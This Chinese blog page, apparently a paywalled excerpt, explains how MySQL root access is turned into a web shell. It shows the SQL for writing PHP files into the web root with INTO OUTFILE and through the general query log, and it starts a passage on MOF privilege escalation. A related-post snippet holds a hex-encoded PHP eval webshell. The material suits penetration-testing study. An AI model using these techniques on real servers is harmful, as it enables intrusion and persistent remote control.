mysql root拿shell_mysql的几种获取shell和提权的方式

最新推荐文章于 2024-09-12 19:16:00 发布

DR阿福

最新推荐文章于 2024-09-12 19:16:00 发布

阅读量664

点赞数

文章标签： mysql root拿shell

本文链接：https://blog.csdn.net/weixin_42557537/article/details/114756488

版权

本文介绍了多种通过MySQL获取系统shell和提权的方法，包括使用outfile导出webshell，利用mysql日志，MOF文件，以及UDF提权。详细阐述了各种方法的条件、步骤和注意事项，如secure_file_priv配置的限制与修改。

摘要由CSDN通过智能技术生成

♥喜欢请点个赞吧♥

mysql outfile导出webshell

条件：知道物理路径，root权限，同时mysql需要有write权限，secure_file_priv配置不为null，查看方法：show global variables like '%secure_file_priv%';

这个参数只能通过修改配置文件后重启mysql修改。

1.select '<?php phpinfo();?>' into outfile 'C:phpStudy/PHPTutorial/WWW/11.php'

2.新建一个表，创建一个空字段，在这个字段里插入php马，再导出

直接导出需要开启安全配置

secure_file_priv参数用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()(读取文件)

mysql日志获取webshell

查看：SHOW VARIABLES LIKE '%general%'

修改状态：set global general_log="ON";

修改储存位置：set global general_log_file='C:/phpStudy/PHPTutorial/WWW/11.php';

写马：select '<?php phpinfo(); ?>';

只需root权限即可

mof提权

MOF提权的条件要求十分严苛：

windows 03及以下版本

mysql启动身份具有权限去读写c:/windows/sy

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

DR阿福

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

通过mysql root账户get shell_渗透学习笔记－－场景篇－－通过mysql的root账号来get shell...

weixin_30229479的博客

02-11

509

场景介绍：今天的场景是前一周在内网渗透的时候遇到过的，找到一个mysql数据库弱口令。账号和密码分别是root，也就是mysql中的dba。这里其实权限很大了，首先mysql的root用户具有文件写权限，同时mysql5.0以上，提供一个system函数，而这个函数通常被攻击者用作shell的接口。那时在遇到这个弱口令时，我就在想怎样快速的拿下这台主...

参与评论您还未登录，请先登录后发表或查看评论

mysql拿shell

baidu_39504221的博客

12-18

649

一般前提：有权限，有绝对路径一般写文件 select 0x3c3f70687020406576616c28245f504f53545b2774657374275d293f3e into outfile'D:\\phpstudy_pro\\WWW\\shell.php'; 以sqli-labs第七关为例虽然这里报错了，但是文件还是写进去了后面就可以用菜刀连接了 ...

mysql_getshell的几种方法

最新发布

carmi的博客

09-12

855

mysql_getshell 一、mysql的--os-shell 利用原理 --os-shell就是使用udf提权获取WebShell。也是通过into oufile向服务器写入两个文件，一个可以直接执行系统命令，一个进行上传文件。此为sqlmap的一个命令，利用这条命令的先决条件：要求为数据库DBA，使用--is-dba查看当前网站连接的数据库账号是否为mysql user表中的管理员...

***学习笔记--场景篇--通过mysql的root账号来get shell

weixin_33815613的博客

12-13

198

场景介绍：今天的场景是前一周在内网***的时候遇到过的，找到一个mysql数据库弱口令。账号和密码分别是root，也就是mysql中的dba。这里其实权限很大了，首先mysql的root用户具有文件写权限，同时mysql5.0以上，提供一个system函数，而这个函数通常被***者用作shell的接口。那时在遇到这个弱口令时，我...

MySQL写Shell方法总结

做自己喜欢的事，并将其发挥到极致！

12-31

4857

MySQL注入点，用工具对目标站点写入一句话shell,需要哪些前提条件？ **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态；(魔术引号，GET、POST、COOKIE) `写入的那个路径要有写入权限过滤了单引号into outfile 还可以用吗不能,GPC要OFF才行，可以测试Hex编码基于UNION联合查询 ?id=1 UNION ALL SELECT

Mysql数据库getshell方法

weixin_68408599的博客

04-02

1829

今天摸鱼时候，突然有人问我不同的数据库getshell的方式，一时间我想到了mysql还有redis未授权访问到getshell的方式，但是仅仅第一时间只想到了这两种，我有查了查资料，找到了上面两种数据库getshell的补充，以及其他数据库getshell的方式。因此更新一个专栏，各个数据库getshell的方式。

MYSQL.rar_MYSQL_ROOT_mysql root_root-Cyclic-Music_sql

09-22

mysql -u root -p Enter password:******* 出现Enter password提后输入root用户的密码，然后即进入mysql客户机的交互模式，可以看到下面的提示： Welcome to the MySQL monitor. Commands end with or \g. Your ...

mysql的shell_基于mysql下的几种写shell方法

weixin_35212670的博客

01-18

2959

0x00关于mysql下的写shell方法网上基本很多了，我原本也没打算总结总结的，毕竟网上已经很多了，不过在看 kilon 大佬的博客的时候，给我的感受就是明明一个几句话的东西，总能详细的，有条有理的记录下来，所以也正是如此，才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站的绝对路径PHP的GPC为 off状态写入的那个路径存在写入权限0x02基于联合查询法下的两个写入方...

MySQL5.7安装过程并重置root密码的方法（shell 脚本）

09-09

/usr/bin/mysql -uroot -p$defaultmysqlpwd ``` 登录后，你需要降低MySQL的密码策略，以便可以设置更简单的密码（如不包含特殊字符的4位密码）。这是可选的，如果你希望保持高安全性，可以跳过这一步： ```sql SET...

mysql 进入shell模式

williamleejian的博客

11-22

5159

在安装完成mysql时，要进入mysql时出现如下的错误，发现是密码错误在观察发现，这个密码是linux本机的root密码；在进入mysql shell模式使用mysql-u root -p

MySQL导出一句话拿WebShell的方法

06-19

MySQL导出一句话拿WebShell的方法

用Mysql得到Webshell（MySql Backup WebShell）

黑客Ｘ元素

04-05

4486

用Mysql得到Webshell（MySql Backup WebShell）此文已发表到《黑客X档案》2005年第1期，请装载时著名来源：黑客X元素Author:XaCk3rEmail:Xack3r@xhacker.cnHTTP://www.xhacker.cn 此篇文章是在一次入侵后的总结，无聊，拿到台湾的一个web站点做测试，开篇进入正题吧！开始拿到web地址时，Ping操作，接着就是

渗透测试之Mysql拿webshell

LKmnbZ's Blog

11-07

934

1.利用 into outfile 直接进行写shell 操作一般是在url 中 2.mysql 的日志操作进行拿shell 1）中间件的应用程序有日志日志的记录位置最关键查看日志位置 show variables like "%general%"; 开启MySQL的全局log general_log 查看每条sql执行记录 set g...

提权学习 -- 使用 mysql 拿到 webshell

LuckyToMeet-Dian叶

06-14

894

注意如造成一切损失，与本人无关！工具准备 scanPort 端口扫描工具，用于扫描内网中开放的端口。 dirBuster 网站目录扫描工具，用于扫描网站的目录已经 URL，暴力破解方式，可能会把服务器弄崩（电脑不咋地的情况）。提权前提对方需要开启服务器，且需要知道服务器在宿主机上的绝对路径知道其 mysql 用户名和密码 mysql 有读写权限，可以向服务器开放目录写木马文件。有上...

mysql数据库拿shell_mysql数据库怎么转到shell>

weixin_28881575的博客

01-19

181

展开全部本文介绍 MySQL 8.0 shell 子模块32313133353236313431303231363533e78988e69d8331333433626538 Util 的两个导入特性 importTable/import_table(JS和python 版本的命名差异)、importJson/import_json的使用方法。其中 import_table 是通过传统 MySQL ...

mysql -i root_[猥琐姿势]利用MySQL的Root账号从而快速GetShell

weixin_34998630的博客

01-28

266

本帖最后由 W3bSafe团队于 2017-1-19 08:31 编辑大家好我又是那个帅帅的小黑子，今天给大家介绍通过mysql的root账号来get shell的猥琐方法，写的不是很详细，但图配了不少，大家应该是会看得懂了好了不说废话，切入正题：今天的场景是前一周在内网渗透的时候遇到过的，找到一个mysql数据库弱口令。账号和密码分别是root，也就是mysql中的dba。这里其实权限很大了，...

shell获取mysql建表sql

Ntozot的博客

09-10

854

脚本如下： #!/usr/bin/expect -f #科目一 table_list_1=&quot;db1.table1,db1.table2&quot; #机动车 table_list_2=&quot;db2.table1,db2.table2&quot; tables_1=${table_list_1//,/ } tables_2=${table_list_2//,/ } for ele in ${tables_1} do...

mysql数据库拿shell_利用数据库拿shell的一些姿势

weixin_34569317的博客

01-26

2202

0x01、利用MySQL命令导出getshell利用条件：1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法：通过into outfile 进行文件写入，写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...

0 14 * * * /root/backup_mysql_shell.sh

01-13

这是一个定时任务的示例，它会在每天的0点14分执行/root/backup_mysql_shell.sh脚本。这个脚本可能是用来备份MySQL数据库的。根据引用中的内容，这个脚本可能会使用mysqldump命令来备份MySQL数据库，并将备份文件保存在指定的目录中。备份的日志可能会被记录在/root/back/mysql/mysqlbak.log文件中。请注意，这只是一个推测，具体的脚本内容和用途需要查看脚本的具体实现。